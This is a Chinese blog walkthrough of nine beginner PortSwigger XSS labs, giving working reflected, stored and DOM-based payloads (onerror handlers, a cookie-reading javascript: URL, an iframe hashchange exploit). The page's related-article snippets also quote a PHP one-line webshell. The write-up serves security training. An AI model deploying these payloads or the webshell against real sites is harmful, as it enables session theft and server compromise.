burp靶场xss漏洞(初级篇)

最新推荐文章于 2024-06-04 19:56:03 发布
最新推荐文章于 2024-06-04 19:56:03 发布
阅读量590 收藏 5
点赞数 10
文章标签: xss 前端
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Zqinglele/article/details/137410818
版权

靶场地址

http://portswigger.net/web-security/all-labs#cross-site-scripting

第一关:反射型

1.发现搜索框直接注入payload

<script>alert(111)</script>

2.出现弹窗即说明攻击成功

第二关:存储型

1.需要在评论里插入payload

2.发表以后返回首页就会出现弹框

第三关:DOM型(在document中)

1.dom型只发生在前端,所以直接查看网页源代码,发现输入的字符串会被存进str进行拼接

2.构造payload

"><svg οnlοad=alert(111)>

第四关:DOM型(在html中)

1.查看网页源代码,发现字符串被包裹在网页代码里

2.构造payload,使src的值无效后调用alert函数

<img src=1 οnerrοr=alert(1)>

第五关:DOM型(在href中)

1.要求在submit feedback界面找xss

2.查看网页源代码,发现返回的路径是可以修改的

3.构造payload,在href后添加值

javascript:alert(document.cookie)

第六关:DOM型(利用hashchange模块)

1.直接查看源代码,发现可以通过修改hash值向受害者发送攻击代码

2.构造payload

<iframe src="https://自己的IP.web-security-academy.net/#" οnlοad="this.src+='<img src=x οnerrοr=print()>'"></iframe>

3. step 1:验证攻击是否有效攻击

   step 2:发送给受害者,造成攻击

第七关:反射型(html编码)

1.在输入框中随便输入字符,查看其在源码中的位置,发现在value后

2.输入payload,将鼠标移动到搜索框处就会触发弹窗

"οnmοuseοver="alert(111)

第八关:存储型("的html编码)

1.随机留下评论后在源码中查看名字所在位置,发现在<a>标签中,同时也说明可以更改href值

2.接下来在有漏洞处插入payload

3.返回评论区点击第二次用户名,出现弹窗证明攻击成功

第九关:反射型(<>过滤)

1.插入payload后,发现源码中过滤了尖括号

2.重新构造payload,使用不带尖括号的alert函数

3.没有出现弹窗,发现后面还有个分号,需要再添加内容

aaa';alert(111);let myvar='test

  也可以直接用单引号闭合

'+alert(1)+' 或 '-alert(1)-'

以上初级关卡全部结束。

季柳东
关注
  • 10
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
Burp-代码漏洞扫描安装包
04-28
Burp-代码漏洞扫描,请直接点文件夹中的BurpUnlimited即可开启正常使用
burpsuite 系统漏洞扫描工具
11-28
burpsuite web系统漏洞扫描工具,windows系统下安装,扫描网站系统漏洞
Web漏洞扫描之BurpSuite.pdf
06-23
Web漏洞扫描之BurpSuite教程
DVWA靶场--文件上传漏洞(low、medium、high等级)
c_programj的博客
04-16 7391
dvwa靶场实践-低中高三个安全等级安全等级:Low安全等级:Medium安全等级:High 关于Webshell Webshell常常被称为入侵者通过网站端口对网站服务器的某种程度上操作的权限。 小马:一句话木马也称为了小马,即整个shell代码量只有一行,一般是系统执行函数。 大马:代码量和功能比小马多,一般会进行二次编码加密,防止被安全防火墙/入侵系统检测到。 shell2.php #eval使用php函数,例如phpinfo( ) <?php eval($_REQUEST[‘cmd’]);?
Webug3.0 初级攻略 1-16关
安全解决方案
02-27 2492
虚拟机下载路径: 链接:https://pan.baidu.com/s/19234CirAiVf3H820uWWNeg  提取码:7jfs  第一关:很简单的一个注入   使用firefox 可以使用一个叫hackbar的插件,方便注入语句的测试 1.提交 ' 报错,可能存在注入点   还是一个字符型的注入漏洞 测试语句:http://172.27.73.13/pentes...
网络安全基础技术扫盲篇 — 常见web漏洞XSS跨站脚本攻击
2401_84301853的博客
04-27 727
知识宝库在此藏,一键关注获宝藏首先我们了解一下原理,用一句话概括就是。在Web应用中,前端代码主要包括HTML、CSS和JavaScript。:HTML 用于描述网页的结构和内容,包括标签、元素、属性等。前端骨架(有很大关系,但不是该漏洞的利用核心)。:CSS用于定义网页的样式和布局。美化作用(和渗透关系不大):JavaScript是一种客户端脚本语言,用于实现动态效果和与用户的交互。恶意的JavaScript代码可以直接在用户的浏览器中执行,导致XSS攻击的发生。
DVWA靶机-XSS与CSRF、文件上传的攻击原理、分类、对比以及漏洞演示(low、Medium、Hign、Impossible)
天下著书立传者,皆为我师
03-16 1102
DVWA靶机--讲解XSS与CSRF、文件上传的攻击原理、分类、对比以及漏洞演示(low、Medium、Hign、Impossible)
DVWA漏洞平台学习之LOW级别
李熠专用博客_白帽子一枚,人称低危终结者
09-13 1377
在上一篇文章中,我们搭建了DVWA平台,本文开始,我将依次带你学习如何在DVWA平台上利用这些漏洞。 首先将DVWA的级别设置为LOW。 接下来,我们开始对每个漏洞进行复现。 0x00 Brute Force-暴力破解 漏洞利用 进入Brute Force页面, 要求输入用户名和密码,进行登录,在LOW级别下,没有做任何的防护,我们可以用BurpSuite进行暴力破解。(关于BurpSuit的使用,你可以自行百度或者关注本公众号后续的文章) 漏洞分析 0x01 Command Injection-命令注入
FastjsonScan.jar 用于burp插件,扫描Fastjson漏洞
07-05
burp插件
【技术分享】梨子带你刷burpsuite靶场系列之客户端漏洞篇 – 基于DOM的漏洞 .pdf
09-05
【技术分享】梨子带你刷burpsuite靶场系列之客户端漏洞篇 – 基于DOM的漏洞 安全防御 大数据 安全管理 安全威胁 漏洞挖掘
搭建学习环境(十)——Webug3.0安装及初级通关记录
baynk的博客
11-30 1254
0x00 前言 安装可以直接下整个虚拟机来完成,也可以自己把虚拟机里面的文件拷到自己的环境的中进行漏洞,不过要修改的地方的比较多,不熟悉的话还是下整机吧。 整机云盘地址:https://pan.baidu.com/s/1MiFYrOGLD3XLBQWsVoSfmw www文件云盘地址:https://pan.baidu.com/s/1pMFlpMMUYmUkELMeTkO-ew 整机是基于wind...
[网络安全自学篇] 六十六.Vulnhub靶机渗透之DC-1提权和Drupal漏洞利用(二)
热门推荐
杨秀璋的专栏
04-11 1万+
这是作者的网络安全自学教程系列,主要是关于安全工具和实践操作的在线笔记,特分享出来与博友们学习,希望您们喜欢,一起进步。前文分享了Vulnhub靶机渗透的环境搭建和JIS-CTF题目,采用Nmap、Dirb、中国蚁剑、敏感文件分析、SSH远程连接、Shell提权等获取5个flag。本文将讲解DC-1提权和Drupal漏洞利用,通过信息收集、CMS漏洞搜索、Metasploit反弹shell、提权及数据库爆破获取flag。本文是一篇Web渗透的基础性文章,希望对您有所帮助。
JS加密解密/XSS的防御
mxd01848的博客
06-03 993
总之,防御 XSS 攻击需要从多个角度进行考虑和处理,包括输入过滤、输出编码以及使用可靠的安全库和框架。通过多层次的防御策略,可以有效地提高应用程序的安全性。这段代码的目的是对用户输入进行过滤,以防止跨站脚本(XSS)攻击。让我们详细拆解这段代码,并分析其工作原理和有效性。怎么隐藏你的xss保护逻辑呢,使用在线js加解密工具对代码进行保护。是一个用于过滤 XSS 攻击的函数。函数进行过滤,然后返回过滤后的结果。进行解码,并将其传递给。最终返回过滤后的字符串。,表示需要过滤的输入。,则不进行后续操作。
使用pikachu Xss后台出现的问题
m0_74608722的博客
06-01 210
在进行xss-x漏洞实验的时候,一直出现上述错误,查找了很多,终于找到问题所在pikachu使用的数据库为同一个数据库,千万别被pkxss误导,以为pikachu还有一个数据库为pkxss,所以在配置的时候写下如下图的
DVWA-XSS(DOM)
y06_z
06-03 508
2.过滤输入的字符,例如 “ ’ ”,“ " ”,“<”,“>” 等非法字符;后端没有代码,点击select按钮动作是前端的JS代码进行处理的。观察后端代码进行了<script和大小写过滤,这里考虑闭合绕过。后,观察页面源码发现payload被插入到了前端界面中执行。但是可以通过注释符#绕过,注释符后面的内容不会发送到服务器。我们点击select之后,在URL后面加入。按之前Low level注入的话,结果如下。3.对输入到页面的数据进行编码。后端没有代码,观察前端代码。将payload改为。
XSS 跨站脚本攻击预防(文件上传)
陌守
06-03 215
可以根据需求自定义,改造为拦截器、或者 AOP 等方式实现。
DVWA-XSS(Reflected)
y06_z
06-04 643
反射型XSS可以用来窃取cookie。
安全测试 之 安全漏洞XSS
最新发布
Orange_hhh的博客
06-04 324
反射型XSS发生在恶意脚本作为参数直接包含在请求的URL中,然后由服务器动态地包含在响应页面里返回给客户端。用户需要点击一个包含恶意链接的URL才会触发攻击。存储型XSS则是将恶意脚本提交到服务器(例如,通过表单提交或评论区),并且存储在服务器的数据库或文件系统中。当其他用户访问包含此恶意脚本的页面时,脚本将从服务器取出并执行。
burp suite scan 到xss漏洞,
06-10
当您使用Burp Suite扫描Web应用程序时,如果扫描结果显示存在XSS漏洞,您可以使用Burp Suite中的漏洞验证器来验证该漏洞是否真实存在,并尝试利用该漏洞进行攻击。具体的操作步骤可以参考Burp Suite的官方文档或相关...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值